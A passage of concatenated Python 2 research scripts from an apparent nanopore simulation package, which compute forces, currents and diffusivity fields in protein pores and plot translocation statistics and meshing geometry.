r0 = Howorka.params_geo3D.r0
rMol = Howorka.default_geop.rMolecule
eps = 1e-2
R = r0 - rMol - eps
Z = np.linspace(-R, R, 21)
X = [[z,0.,0.] for z in Z]
#X = [[0.,0.,0.]]
print velocities(X, nproc=7, name="howorka_velo3D_2", **params)
do_plot = False
redo_plot = False
if do_plot:
imax = user_params(imax=15)["imax"]
if redo_plot:
x = [0.2, 0., 0.]
#x = [0., 0., 0.]
setup = Howorka.Setup(x0=x, **params)
f, v, dv = velocity_iteration(setup, imax)
nanopores.save_stuff("velocity_iteration", f.tolist(), v.tolist(), dv.tolist())
f, v, dv = nanopores.load_stuff("velocity_iteration")
dim = params["dim"]
plt.semilogy(range(1, imax+1), 1e12*np.sqrt(np.sum(np.array(f)**2, 1)),
"s-", label="net force on molecule")
plt.ylabel("force [pN]")
plt.xlabel("# iterations")
plt.xlim(xmin=1, xmax=imax)
plt.xticks(range(1,imax+1))
plt.legend(loc="best")
fig = plt.gcf()
fig.set_size_inches((4,3))
nanopores.savefigs("howorka_velocity_3D_z0", FIGDIR)
```
#### File: scripts/plot_forces_aHem/calculateforce.py
```python
import math
import numpy as np
from nanopores import *
from nanopores.physics.exittime import ExitTimeProblem
from dolfin import *
def calculateforce(clscale=10., subdomain=None):
geo_params = dict(
l3 = 15.,#60
l4 = 10.,
R = 15.,#60
x0 = None, #[5., 0., 10.], # |x0| > 2.2
exit_i = 1,
)
phys_params = dict(
bV = .5,
ahemqs = 0.01,
rTarget = 0.5*nm,
bulkcon = 1000.,
)
skip_stokes = False
StokesProblem.method["iterative"] = True
taylorhood = True # if True, use P2-P1 discretization for Stokes instead of P1-P1.
# (True leads too much bigger system but better convergence of iterative solver)
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
t = Timer("meshing")
meshdict = generate_mesh(clscale, "aHem", **geo_params)
print "Mesh generation time:",t.stop()
t = Timer("reading geometry")
geo = geo_from_xml("aHem")
print "Geo generation time:",t.stop()
phys = Physics("pore_molecule", geo, **phys_params)
pde = PNPS(geo, phys, taylorhood=taylorhood)
pde.tolnewton = 1e-2
if skip_stokes:
pde.solvers.pop("Stokes")
pde.solve()
(v, cp, cm, u, p) = pde.solutions(deepcopy=True)
F, Fel, Fdrag = phys.Forces(v, u)
# save mesh and forces
File("mesh.xml") << geo.mesh
File("F.xml") << F
File("Fel.xml") << Fel
File("Fdrag.xml") << Fdrag
for domain in ["pore", "poretop", "porecenter", "porebottom", "fluid_bulk_top", "fluid_bulk_bottom"]:
print "Average F in %s:"%domain, assemble(F[2]*geo.dx(domain))/assemble(Constant(1.0)*geo.dx(domain))
return geo.mesh, v
#VV = VectorFunctionSpace(geo.mesh, "CG", 1)
#return project(F, VV)
def loadforces():
mesh = Mesh("mesh.xml")
V = VectorFunctionSpace(mesh, "CG", 1)
F = Function(V, "F.xml")
Fel = Function(V, "Fel.xml")
Fdrag = Function(V, "Fdrag.xml")
return F, Fel, Fdrag
#def loadforces2():
# mesh = Mesh("mesh_test_drag.xml")
# V = VectorFunctionSpace(mesh, "CG", 1)
# F = Function(V, "F_test_drag.xml")
# Fel = Function(V, "Fel_test_drag.xml")
# Fdrag = Function(V, "Fdrag_test_drag.xml")
# return F, Fel, Fdrag
if __name__ == "__main__":
add_params(scale = 10.)
mesh, v = calculateforce(clscale=scale)
```
#### File: scripts/plot_scripts/current_trace_2D.py
```python
from nanopores import *
from dolfin import *
geo_name = "H_geo"
nm = 1e-9
params = dict(
Ry = 30*nm,
Rx = 15*nm,
rMolecule = 0.77*nm,
r0 = 1.2*nm,
)
phys_params = {"Membraneqs": -0.03, "bV": -0.1, "Qmol": -0*qq,}
def drange(start, stop, step):
r = start
while min(start,stop) <= r <= max(start,stop):
yield r
r += step
def save(data, fname):
with open('%s.txt' % fname, 'w') as f:
f.write('\n'.join([str(s) for s in data]))
def load(fname):
with open('%s.txt' % fname, 'r') as f:
data = f.read().split('\n')
return data
Ry_ = params["Ry"]-2*params["rMolecule"]
Z = []
V = []
I = []
ndigits = 9+4
for z in drange(Ry_, -Ry_, -1*nm):
z = round(z, ndigits)
print "\nz = ",z,"\n"
Z.append(z*1e9)
x0 = [0, 0, z]
meshgen_dict = generate_mesh(0.5, geo_name, x0 = x0, **params)
geo = geo_from_name(geo_name, x0 = x0, **params)
PNPSAxisym.tolnewton = 1e-1
pnps = PNPSAxisym(geo, **phys_params)
pnps.solve(refinement=False, save_mesh=False)
(v,cp,cm,u,p) = pnps.solutions()
I0 = -pnps.get_functionals()["Javgbtm"] if z>0 else -pnps.get_functionals()["Javgtop"]
I.append(I0)
V.append(v([0.0, 10*nm]) - v([0.0, -10*nm]))
#print "I (current through pore center):",I,"[pA]"
#print "V (transmembrane potential):",V,"[V]"
#print "conductance I/V:",I/V,"[pS]"
from numpy import isnan
for i,x in enumerate(V):
if isnan(x):
V[i] = V[i-1]
I[i] = I[i-1]
#for s in ["Z","I","V"]:
# save(vars()[s], s)
import matplotlib.pyplot as plt
label = "r = %.2fnm" %(params["rMolecule"]*1e9,)
fname = "current_%dmV_%de_%.2fnm.eps" %(int(phys_params["bV"]*1000), int(phys_params["Qmol"]/qq), params["rMolecule"]*1e9)
plt.plot(Z,I, label=label)
plt.xlabel("z-coordinate of molecule center [nm]")
plt.ylabel("current [pA]")
plt.legend(loc='lower right')
plt.savefig(fname, bbox_inches='tight')
```
#### File: scripts/pughpore/hack_pugh2D.py
```python
import nanopores.tools.box as box
import nanopores.tools.balls as balls
import nanopores.geometries.pughpore as pugh
import nanopores.py4gmsh as gmsh
Box = balls.Box
pugh.set_tol(1e-5)
dom = pugh.get_domain_cyl()
dom.addboundaries(leftb=dom.boundary("left"))
left = dom.getboundary("leftb")
mol = pugh.EmptySet()
dom.addsubdomain(mol, "molecule")
dom.addboundary(mol.boundary() - left, "moleculeb")
dom.compute_entities()
dom.compute_boundaries(True)
# points of half circle
x0 = [0.,-15.]
r = 2.
lcMolecule = 0.4
lc = 1.
def entity2box(ent):
intervals = [(f if isinstance(f, tuple) else (f,f)) for f in ent]
return Box(intervals=intervals)
edgeinds = list(left.indexsets[1])
edgeents = [dom.entities[1][i] for i in edgeinds]
edge = [entity2box(dom.entities[1][i]) for i in edgeinds]
points = [(x0[0], x0[1]-r), tuple(x0), (x0[0], x0[1]+r)]
circle = [Box(points[i], points[i+1]) for i in range(len(points)-1)]
N = len(edge)
dic = box.multi_box_union(edge + circle)
# add additional point entities
for p in dic["entities"][0]:
if not p in dom.entities[0]:
dom.entities[0].append(p)
# add new edge entities and compute replacement
replace = {i:[] for i in edgeinds}
circleb = []
for s, ent in zip(dic["esets"][1], dic["entities"][1]):
for j in s:
if j < len(edgeinds): # is old edge
i = edgeinds[j]
replace[i].append(ent)
if j >= len(edgeinds): # belongs to circle
print j
circleb.append(ent)
for k in replace.keys():
for i, ent in enumerate(replace[k]):
if ent in dom.entities[1]:
j = dom.entities[1].index(ent)
else:
dom.entities[1].append(ent)
j = len(dom.entities[1]) - 1
print j, ent
replace[k][i] = j
for k, v in replace.items():
if len(v)==1 and k==v[0]:
replace.pop(k)
print replace
old = set(replace.keys())
new = box.union(set(v) for v in replace.values())
# replace edge indices in boundary
left.indexsets[1] = left.indexsets[1] - old | new
# compute left circle boundary
for i, ent in enumerate(circleb):
if ent in dom.entities[1]:
j = dom.entities[1].index(ent)
else:
dom.entities[1].append(ent)
j = len(dom.entities[1]) - 1
circleb[i] = j
print "circle:", circleb
# gmsh circle
lcCirc = lcMolecule*lc
m0, m1 = x0[0], x0[1]
pcirc = [(m0, m1), (m0, m1-r), (m0+r, m1), (m0, m1+r)]
dom.entities[0].append(pcirc[2])
dom.gmsh_entities = [[None for e in k] for k in dom.entities]
pcirc = [dom.entity_to_gmsh(p, 0, lcCirc) for p in pcirc]
surfs = [gmsh.Circle([pcirc[1], pcirc[0], pcirc[2]]),
gmsh.Circle([pcirc[2], pcirc[0], pcirc[3]])]
dom.gmsh_entities[1] += surfs
N = len(dom.gmsh_entities[1])
circlearc = [N-2, N-1]
for k, v in replace.items():
removed = False
for j in list(v):
print "adding", j,"to replace"
if j in circleb:
replace[k].remove(j)
removed = True
if removed:
replace[k].extend(circlearc)
print replace
# add edge indices to molecule boundary
mol.bdry().indexset = set(circleb + circlearc)
mol.bdry().indexsets[1] = set(circleb + circlearc)
for i in circleb:
mol.bdry().orients[i] = -1
for i in circlearc:
mol.bdry().orients[i] = 1
# replace edge indices sub.boundaries
for sub in dom.subdomains + dom.boundarysubs:
iset = sub.bdry().indexset
orients = sub.bdry().orients
for i in iset & old:
iset.remove(i)
for j in replace[i]:
iset.add(j)
if j in circlearc:
orients[j] = -1
else:
orients[j] = orients[i]
print sub.name, i, j, orients[j]
dom.entities_to_gmsh_merge(lc)
# rebuild boundaries involving balls
for bou in dom.boundaries:
bou.indexset = bou.csg.evalsets()[1]
dom.physical_to_gmsh(True)
dom.geo = box.to_mesh()
dom.geo.params = dom.params
if hasattr(dom, "synonymes"):
dom.geo.import_synonymes(dom.synonymes)
dom.plot()
```
#### File: scripts/pughpore/passagetime-simple.py
```python
from __future__ import unicode_literals
# (c) 2017 <NAME>
# TODO: obtain rD from actual simulation
from nanopores import fields, kT, eta, qq, savefigs
from numpy import exp, pi, sqrt, linspace, diff, array, dot
L = 46e-9 # length of pore
r = 2.0779e-9 # radius of protein trypsin
V = 0.08 # applied potential
E = V/L # electric field
rD = 0.2
#D = rD* kT/(6.*pi*eta*r) # diffusion constant (Stokes)
# load translocation events without binding
name = "events3_nobind_new"
fields.set_dir_mega()
data = fields.get_fields(name)
# take only events that translocated
data.pop("b1")
data.pop("b2")
data, _ = fields._subset(data, data["ood"], lambda x: x==0)
data, times = fields._sorted(data, data["t"])
print "mean"
D = array(data["Dzavg"]).mean() * 1e-9
F = -array(data["Fzavg"]).mean()
v = D/kT * F # electrophoretic velocity
print "D = ", D, "F = ", F, "v = ", v
print "at x = (0,0,0)"
D = 6.8e-12
F = 1.5e-11
v = D/kT * F # electrophoretic velocity
print "D = ", D, "F = ", F, "v = ", v
def mean(lst):
return sum(lst)/float(len(lst))
def maximum_likelihood(times, n=10):
times = 1e-3 * array(times)
T = mean(times)
Tinv = mean([1./t for t in times])
def amean(v):
return mean([1./(1. + L/(v*t)) for t in times])
def fix(v):
a = amean(v)
factor = (sqrt((a-.5)**2 + T*Tinv*a*(1-a)) - (a-.5))/(1-a)
print a
#print factor
return L/T * factor
v = L*sqrt(Tinv/T) # this initial guess is accurate to 1e-7!!
for i in range(n):
v0 = v
#print "i = %d: v = %s" % (i, v)
v = fix(v)
print "i = %d: dv = %s" % (i, abs(v-v0))
D = v**2/2.*T - v*L + L**2/2.*Tinv
return v, D
v, D = maximum_likelihood(times)
print "maximum likelihood"
print "D = ", D, "F = ", v*kT/D, "v = ", v
# simple 1D model from Talaga2009
def p(t, timescale=1.):
# timescale: 1 -> s, 1e-3 -> ms etc
t *= timescale
return exp(-(L - t*v)**2/(4.*t*D)) * (L + t*v) / (4.*t * sqrt(pi*t*D))
def pp(times, timescale=1.):
return array([p(t, timescale) for t in times])
def integrate(t, pt):
pt = array(pt)
dt = diff(t)
values = 0.5*(pt[:-1] + pt[1:])
return dot(values, dt)
def integrate_hist(hist):
n, bins, _ = hist
dt = diff(bins)
return dot(n, dt)
# scale times
scale = 1e-6 # microseconds
times = [t*1e-3/scale for t in times]
from matplotlib import pyplot as plt
t = linspace(1e-9/scale, 8e-6/scale, 500)
hist = plt.hist(times, bins=30, color="#aaaaff", linewidth=0.5,
weights=[1./500.]*len(times),
label="BD simulations")
pt = pp(t, scale) * integrate_hist(hist) * scale
plt.plot(t, pt, "-", color="g", linewidth=3, label="FPT model")
plt.legend(loc="upper right", frameon=False)
plt.xlabel(u"dwell time [µs]")
plt.ylabel(u"rel. frequency")
print "integral", integrate_hist(hist), "==", integrate(t, pt)
#plt.figure()
#plt.hist(data["Fzavg"], bins=30, color="#aaaaff", linewidth=0.5)
#
#plt.figure()
#plt.hist(data["Dzavg"], bins=30, color="#aaaaff", linewidth=0.5)
from folders import FIGDIR
savefigs("current-nobind-hist", FIGDIR + "/rw")
```
#### File: scripts/pughpore/plot_D_field.py
```python
from matplotlib import rcParams, rc
rcParams.update({
"font.size" : 7,
"axes.titlesize" : 7,
"font.family" : "sans-serif",
"font.sans-serif" : ["CMU Sans Serif"],
"lines.linewidth" : 1,
"lines.markersize" : 5,
})
import matplotlib.pyplot as plt
import numpy as np
import nanopores
import nanopores.geometries.pughpore as pughpore
from nanopores.models.pughpore import polygon as pughpolygon
from nanopores.models.pughpoints import plot_polygon
from nanopores.tools import fields
fields.set_dir_mega()
from nanopores.models.diffusion_interpolation import get_diffusivity
# from nanopores.tools.utilities import uCross, RectangleMesh
# from math import pi, sqrt
#
# dparams = {2: dict(diamPore=6., diamDNA=2.5, Nmax=1.2e5, dim=2, r=0.11, h=.75,
# cheapest=False, Membraneqs=-.5),
# 3: dict(diamPore=6., Nmax=1e6, dim=3, r=0.11, h=2.0, cheapest=False)}
# obtain diffusivity field and project to x-z plane
params = dict(geoname = "pughcyl", dim=2, r=0.11, h=.5, Nmax=1e5,
cheapest=False, Membraneqs=-0.2)
functions, mesh = get_diffusivity(**params)
#functions = get_pugh_diffusivity(**dparams[2])
#setup = pugh.Setup(dim=2, h=1., Nmax=1e5, x0=None, diffusivity="Dpugh2")
#setup.prerefine()
#pugh.set_D(setup)
#D3D = setup.phys.Dp[1, 1]
#print D3D([0.,0.])
D3D = functions["D"][0]
D0 = nanopores.D
def F(x, z):
if x>=0:
return D3D([x, z])/D0
else:
return D3D([-x, z])/D0
#D = uCross(u=D3D, axis=1, degree=1, dim=2)
# obtain 2D mesh where we will evaluate field
rx, ry = pughpore.params["R"], 0.5*pughpore.params["H"]
rx, ry = 15, 28
Nx, Ny = 201, 401
#mesh2D = RectangleMesh([-R,-H/2.], [R, H/2.], int(4*R), int(2*H))
Y, X = np.mgrid[-ry:ry:Ny*1j, -rx:rx:Nx*1j]
U = np.zeros((Ny,Nx))
for y in range(Ny):
for x in range(Nx):
U[y][x] = F(X[y][x], Y[y][x])
fig, ax = plt.subplots(figsize=(1.73, 1.9)) #, dpi=300)
pc = plt.pcolor(X, Y, U, cmap=plt.get_cmap("bone"), vmin=0, vmax=1)
plot_polygon(ax, pughpolygon(diamPore=6., rmem=15), linewidth=0.2)
plt.xlim(-15, 15)
plt.ylim(-25, 28)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
bbox = ax.get_position()
l, b, h = bbox.x0, bbox.y0, bbox.height
w = 0.05
cbaxes = fig.add_axes([l - w - 0.07, b, w, h])
cb = plt.colorbar(pc, cax=cbaxes, ax=ax)
cbaxes.set_ylabel("Rel. diffusivity") # (r"$D_{zz} / D_0$")
cb.set_ticks([0., 1.])
cb.set_ticklabels([0, 1])
cbaxes.yaxis.set_ticks_position('left')
cbaxes.yaxis.set_label_position('left')
cbaxes.yaxis.labelpad = -3.
import os
HOME = os.path.expanduser("~")
FIGDIR = os.path.join(HOME, "Dropbox", "Paper Howorka", "figures")
nanopores.savefigs("pugh/Dfield", FIGDIR)
plt.show()
```
#### File: scripts/pughpore/plot_diffusivity.py
```python
import numpy as np
import matplotlib.pyplot as plt
from diffusion import calculate_diffusivity2D
import nanopores.tools.fields as f
import nanopores
import folders
def zsorted(data, field):
z = [x[2] for x in data["x"]]
J = data[field]
I = sorted(range(len(z)), key=lambda k: z[k])
z1 = [z[i] for i in I]
J1 = [J[i] for i in I]
return z1, J1
def plot_D_data(data, label=None, num=None):
fig, ax = plt.subplots(figsize=(5, 4), num=num)
Z, D = zsorted(data, "D")
# plot
ax.plot(Z, D, ".-", label=label)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel(r"D/D0")
ax.set_title("rel. diffusivity (2D model)")
ax.legend(loc="best")
f.update()
data = f.get_fields("pugh_diff2D_backup", rMolecule=0.11)
#rMolecule=2.0779)
plot_D_data(data, "D")
#plt.show()
#exit()
# points
H = 50.
Z = np.linspace(-H, H, 96)
X = [[0.,0.,z] for z in Z]
fig_big, ax_big = plt.subplots(figsize=(10, 8), num="all")
fig_small, ax_small = plt.subplots(figsize=(6, 4), num="small")
# get data
for r in [0.152, 0.167, 0.25, 2.0779]:
#data = calculate_diffusivity2D(X, nproc=6, rMolecule=r, h=.6, Nmax=2.7e5)
#data = calculate_diffusivity2D(X, nproc=6, rMolecule=r)
data = f.get_fields("pugh_diffusivity2D", rMolecule=r, h=.6, Nmax=2.7e5)
Z, D = zsorted(data, "D")
# plot
ax = ax_big
ax.plot(Z, D, ".-", label="r=%.3f, N=270k" %r)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
if r>=0.25: continue
names = {0.152: r"$\rm{K}^{+}$", 0.167: r"$\rm{Cl}^{-}$"}
Dmax = max(D)
D0 = [d/Dmax for d in D]
ax = ax_small
ax.plot(Z, D0, ".-", label=names[r])
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
# coarser calculation for remaining radii
for r in [0.5, 1., 1.5]:
N = 2e4
data = f.get_fields("pugh_diffusivity2D", rMolecule=r, h=4., Nmax=N)
Z, D = zsorted(data, "D")
# plot
ax = ax_big
ax.plot(Z, D, ".-", label="r=%.3f, N=20k" %r)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
ax_big.legend(bbox_to_anchor=(1.05, 1.), loc="upper left", borderaxespad=0.,)
ax_small.legend(bbox_to_anchor=(1.05, 1.), loc="upper left", borderaxespad=0.,)
ax_small.legend(loc="lower right")
#nanopores.savefigs("pugh_diffusivity", folders.FIGDIR)
plt.show()
```
#### File: pughpore/randomwalk/create_plot_traj_without_dolfin.py
```python
from matplotlib.ticker import FormatStrFormatter
import matplotlib
#import nanopores as nano
#import nanopores.geometries.pughpore as pughpore
#from nanopores.models.pughpore import polygon
#from nanopores.models.pughpoints import plot_polygon
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
#import nanopores.tools.fields as f
#HOME = os.path.expanduser("~")
#PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
#FIGDIR = os.path.join(PAPERDIR, "figures", "")
#DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
#f.set_dir(DATADIR)
###############################
# (c) 2017 <NAME>
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
default = dict(
R = 20.,
H = 70.,
l0 = 18., #22.5,
l1 = 14., #17.5,
l2 = 10., #12.5,
l3 = 6., #7.5,
l4 = 14., #17.5,
hpore = 46,
hmem = 2.2,
h2 = 46.-35., # 11.
h1 = 46.-35.-2.5, # 8.5
h4 = 10.,
hnear = 12,
rMolecule = 2.0779, # molecular radius of protein trypsin
x0 = [0., 0., 0.],
lcMolecule = 0.4, # relative to global mesh size
center_at_x0 = False,
center_z_at_x0 = False,
)
class Params(dict):
"for writing params.Qmol instead of params['Qmol']"
def __getattr__(self, key):
return self[key]
def __or__(self, other):
new = Params(self)
new.update(other)
return new
def plot_polygon(ax, polygon):
settings = dict(closed=True, facecolor="#eeeeee", linewidth=1.,
edgecolor="black")
polygon = np.array(polygon)
polygon_m = np.column_stack([-polygon[:,0], polygon[:,1]])
patch = patches.Polygon(polygon, **settings)
patchm = patches.Polygon(polygon_m, **settings)
#patch.set_zorder(10)
#patchm.set_zorder(10)
ax.add_patch(patch)
ax.add_patch(patchm)
def polygon(rmem=20., **params):
"polygon of pore + membrane for plotting"
#setup = SetupNoGeo(**params)
#params = nano.Params(pughpore.params) | setup.geop
params = Params(default, **params)
r = [0.5*params.l3, 0.5*params.l2, 0.5*params.l1, 0.5*params.l0,
0.5*params.l4, rmem]
ztop = params.hpore/2.
zbot = -ztop
z = [zbot, ztop - params.h2, ztop - params.h1, ztop, zbot + params.h4,
zbot + params.hmem]
# indices: [(0,0), (0,1), (1,1), (1,2), ..., (5,5), (5,0)]
return [(r[i / 2 % 6], z[(i+1) / 2 % 6]) for i in range(12)]
###############################
up = Params(default, k=3)
hpore=up.hpore
l0 = up.l0
l1 = up.l1
l2 = up.l2
l3 = up.l3
l4 = up.l4
hpore = up.hpore
hmem = up.hmem
h2 = up.h2
h1 = up.h1
h4 = up.h4
#fieldsname='events_onlyone_2'
#params=dict(avgbind1=2e7,avgbind2=3e4,P_bind1=8.e-2,P_bind2=0*3e-1,z0=hpore/2.+0.)
#i=15
#showtraj = True
#def save_fig_traj(params,fieldsname,i,showtraj):
def assertdir(DIR):
if not os.path.exists(DIR):
os.makedirs(DIR)
def savefigs(name="fig", DIR="/tmp/", size=None, pdf=False):
if not DIR.endswith("/"): DIR = DIR + "/"
assertdir(DIR)
if len(plt.get_fignums()) == 1:
fig = plt.figure(plt.get_fignums()[0])
if size is not None:
fig.set_size_inches(size)
if not pdf: suffix='.eps'
else: suffix='.pdf'
fig.savefig(DIR + name + suffix, bbox_inches="tight")
return
for num in plt.get_fignums():
fig = plt.figure(num)
label = fig.get_label()
label = str(num) if label=="" else label
if size is not None:
fig.set_size_inches(size)
if not pdf: suffix='.eps'
else: suffix='.pdf'
fig.savefig(DIR + name + "_" + label + suffix, bbox_inches="tight")
def save_fig_traj():
showtraj = False
# data=f.get_fields(fieldsname,**params)
b1 = [[[l3/2.,-hpore/2.],[l3/2.,hpore/2.-h2],[l2/2.,hpore/2.-h2],[l2/2.,hpore/2.-h1],[l1/2.,hpore/2.-h1],[l1/2.,hpore/2.]]]
# b2 = [[[l3/2.-.5,11.],[l3/2.-.5,-3.]]]
# b2 = [[[l3/2.,-11.],[l3/2.,3.]]]
# b1 =data["b1"]
# b2 =data["b2"]
if showtraj:
X = data["X"][0]
Y = data["Y"][0]
Z = data["Z"][0]
T = data["T"][0]
J = data["J"][0]
J=J.load()
T=T.load()
curr = 7.523849e-10
bind1 = np.where(T>1e6)[0]
bind2 = np.intersect1d(np.where(T<=1e6)[0],np.where(T>100.)[0])
amplitude = curr-np.inner(J,T)/np.sum(T)
for k in range(1,T.shape[0]):
T[k]=T[k]+T[k-1]
tau_off=T[-1]
J=J*1e12
figname = fieldsname+'_traj_'+'%.8f'%(tau_off*1e-6)+'_%04d'%i+'_%.1e_%.1e_%.1e_%.1e'%(params["avgbind1"],params["avgbind2"],params["P_bind1"],params["P_bind2"])+str(params["z0"])
else:
# figname = fieldsname+'_bindzones'+'_%.1e_%.1e_%.1e_%.1e'%(params["avgbind1"],params["avgbind2"],params["P_bind1"],params["P_bind2"])+str(params["z0"])
figname = 'bindzones_both.eps'
if showtraj:
fig=plt.figure(figsize=(8,5),dpi=80)
else:
fig=plt.figure(figsize=(3,5),dpi=80)
color2='#ff0000'
color1='#ff9900'
color3='#00ff00'
#b1 = [[[l1/2.,17.],[l1/2.,19.]],[[l3/2.,-hpore/2.],[l3/2.,hpore/2.-h2],[l2/2.,hpore/2.-h2],[l2/2.,14.]]]
for seq in b1:
x= [p[0] for p in seq]
xm=[-p[0] for p in seq]
y= [p[1] for p in seq]
plt.plot(x,y,color=color1,linewidth=2.)
plt.plot(xm,y,color=color1,linewidth=2.)
b2 = [[[l3/2.-.5,-4.],[l3/2.-.5,4.]]]
for seq in b2:
x= [p[0] for p in seq]
xm=[-p[0] for p in seq]
y= [p[1] for p in seq]
plt.plot(x,y,color=color2,linewidth=2.)
plt.plot(xm,y,color=color2,linewidth=2.)
if showtraj:
plt.plot(X,Z,linewidth=1.,c='#0000ff')
longer = plt.scatter(X[bind1],Z[bind1],s=200,marker='h',c=color2,linewidth=0.)
shorter = plt.scatter(X[bind2],Z[bind2],s=100,marker='h',c=color1,linewidth=0.)
start = plt.scatter([X[0]],[Z[0]],s=200,marker='x',c=color3,linewidth=2.)
patches=[start]
labels=['Start']
if showtraj and len(bind1)>0:
patches=patches+[longer]
labels+=['Longer bindings']
if showtraj and len(bind2)>0:
patches=patches+[shorter]
labels+=['Shorter bindings']
if showtraj:
plt.legend(patches,labels,scatterpoints=1,loc=(.42,.15))
ax=plt.gca()
ax.set_aspect('equal')
if showtraj:
ax.set_xlim([20.,-55.])
ax.set_ylim([-25.,40.])
else:
ax.set_xlim([20.,-20.])
ax.set_ylim([-25.,40.])
ax.set_xticks([])
ax.set_yticks([])
plt.axis('off')
plot_polygon(ax,polygon(rmem=60.))
if showtraj:
plt.axes([.55,.5,.2,.3])
plt.title('Current signal')
ax=plt.gca()
if tau_off<1e3:
t = np.linspace(0.,tau_off,3)
fac=1.
ax.set_xlabel('time [$ns$]')
elif tau_off<1e6 and tau_off>=1e3:
t = np.linspace(0.,tau_off*1e-3,3)
fac = 1e-3
ax.set_xlabel(r'time [$\mu s$]')
else:
t = np.linspace(0.,tau_off*1e-6,3)
fac = 1e-6
ax.set_xlabel('time [$ms$]')
T=T*fac
plt.plot(T,J,color='#000000')
yt = np.linspace(580.,760,4)
ax.set_ylabel(r'A [$pA$]')
ax.set_yticks(yt)
ax.set_xticks(t)
xfmt=FormatStrFormatter('%.1f')
ax.xaxis.set_major_formatter(xfmt)
ax.set_xlim([-4e-2*tau_off*fac,(1.+4e-2)*tau_off*fac])
plt.tight_layout()
#savefigs(name=figname,DIR='/home/bstadlbau/plots/')
plt.show()
# print 'savefig: %s'%figname
# plt.close("all")
save_fig_traj()
```
#### File: pughpore/randomwalk/get_D_old.py
```python
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
import numpy as np
import os
from nanopores.tools import fields
from scipy.interpolate import interp1d
HOME = os.path.expanduser("~")
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
fields.set_dir(DATADIR)
data = fields.get_fields("pugh_diff3D_cross", bulkbc=True, rMolecule=2.0779)
def smooth3(l):
A=np.array(l)
B=A[:]
ker=np.array([1./3,1./3,1./3])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smooth5(l):
A=np.array(l)
B=A[:]
ker=np.array([.2,.2,.2,.2,.2])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smootha(l):
A=np.array(l)
B=A[:]
ker=np.array([10.,12.,15.,12.,10.])
ker=ker/np.sum(ker)
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
x = [z[0] for z in data["x"]]
data, x = fields._sorted(data, x)
eps=5e-3
x_=x[:]
#x_.extend([1.,1.+eps,1.+2*eps,1.+3*eps])
x.extend([(x[-1]+1.)/2.,1.,1.+eps,1.+2*eps,1.+3*eps,1.+4*eps,1.+5*eps])
dstr = ["x", "y", "z"]
Dxx = [D[0][0] for D in data["D"]]
Dyy = [D[1][1] for D in data["D"]]
Dzz = [D[2][2] for D in data["D"]]
Dxx_ = [D[0][0] for D in data["D"]]
Dyy_ = [D[1][1] for D in data["D"]]
Dzz_ = [D[2][2] for D in data["D"]]
Dxx.extend([0.,0.,0.,0.,0.,0.,0.])
Dyy.extend([Dyy[-1]/2.,0.,0.,0.,0.,0.,0.])
Dzz.extend([Dzz[-1]/2.,0.,0.,0.,0.,0.,0.])
#Dxx_.extend([0.,0.,0.,0.])
#Dyy_.extend([0.,0.,0.,0.])
#Dzz_.extend([0.,0.,0.,0.])
Dxx=smooth5(smooth3(Dxx))
Dyy=smooth5(smooth3(Dyy))
Dzz=smooth5(smooth3(Dzz))
Dx = interp1d(x,Dxx)
Dy = interp1d(x,Dyy)
Dz = interp1d(x,Dzz)
DDxx = [0.]+[(Dxx[i+1]-Dxx[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDyy = [0.]+[(Dyy[i+1]-Dyy[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDzz = [0.]+[(Dzz[i+1]-Dzz[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
dDx = interp1d(x,DDxx)
dDy = interp1d(x,DDyy)
dDz = interp1d(x,DDzz)
if __name__=='__main__':
xc=np.linspace(0.,1.,100)
plt.plot(x_,Dxx_,color='blue',linestyle=':')
plt.scatter(x_,Dxx_,color='blue')
plt.scatter(x,Dxx,color='blue')
#plt.plot(x,Dxx,color='blue')
plt.plot(xc,Dx(xc),color='blue',label=r"$D_{%s%s}$" % (dstr[0], dstr[0]))
plt.scatter(x,DDxx,color='blue')
#plt.plot(x,DDxx,color='blue')
plt.plot(xc,dDx(xc),color='blue')
plt.plot(x_,Dyy_,color='red',linestyle=':')
plt.scatter(x_,Dyy_,color='red')
plt.scatter(x,Dyy,color='red')
#plt.plot(x,Dyy,color='red')
plt.plot(xc,Dy(xc),color='red',label=r"$D_{%s%s}$" % (dstr[1], dstr[1]))
plt.scatter(x,DDyy,color='red')
#plt.plot(x,DDyy,color='red')
plt.plot(xc,dDy(xc),color='red')
plt.plot(x_,Dzz_,color='green',linestyle=':')
plt.scatter(x_,Dzz_,color='green')
plt.scatter(x,Dzz,color='green')
#plt.plot(x,Dzz,color='green')
plt.plot(xc,Dz(xc),color='green',label=r"$D_{%s%s}$" % (dstr[2], dstr[2]))
plt.scatter(x,DDzz,color='green')
#plt.plot(x,DDzz,color='green')
plt.plot(xc,dDz(xc),color='green')
plt.xlabel('distance from pore center [nm]')
plt.ylabel('diffusivity relative to bulk')
plt.legend(loc='lower left')
plt.tight_layout()
plt.savefig('get_new.png')
```
#### File: pughpore/randomwalk/noc.py
```python
from math import exp, factorial, pow
